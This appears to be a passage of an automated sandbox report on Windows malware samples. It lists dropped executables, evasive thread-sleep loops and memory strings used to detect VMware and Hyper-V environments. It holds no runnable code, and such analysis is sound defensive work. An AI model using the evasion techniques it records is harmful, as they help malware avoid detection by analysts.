Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\niko[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FFE8.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7188	Thread sleep count: 3982 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7188	Thread sleep count: 5750 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599775s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599450s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599336s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598789s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598527s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597982s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596926s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596757s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596529s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596122s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595669s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595118s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -595013s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7132	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594544s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594108s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -593885s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448	Thread sleep time: -593781s >= -30000s	Jump to behavior
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8652	Thread sleep count: 298 > 30
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8652	Thread sleep time: -59600s >= -30000s
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 7988	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8696	Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 1593 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 103 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8384	Thread sleep count: 423 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0040553A FindFirstFileA,		18_2_0040553A
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		18_2_004055DE

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E35824C0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7E35824C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599336	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596757	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596529	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595118	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595013	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594787	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593885	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\

Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: svchost.exe, 0000000D.00000002.2762397674.000001B899B32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2789612356.000001F4D86DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.2734633593.000001E0D128C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7Fup
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: svchost.exe, 0000000B.00000002.2695550884.000001E0D124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C6000c298128b8c02a71a2474aeb5f3dc\|Virtual disk \|VMware
Source: svchost.exe, 0000001C.00000002.2523419061.0000017993A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &@\??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000024.00000000.1419179675.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 0000001C.00000003.1311533226.0000017993A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001C.00000002.2523419061.0000017993A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2721253426.000001E0D1264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
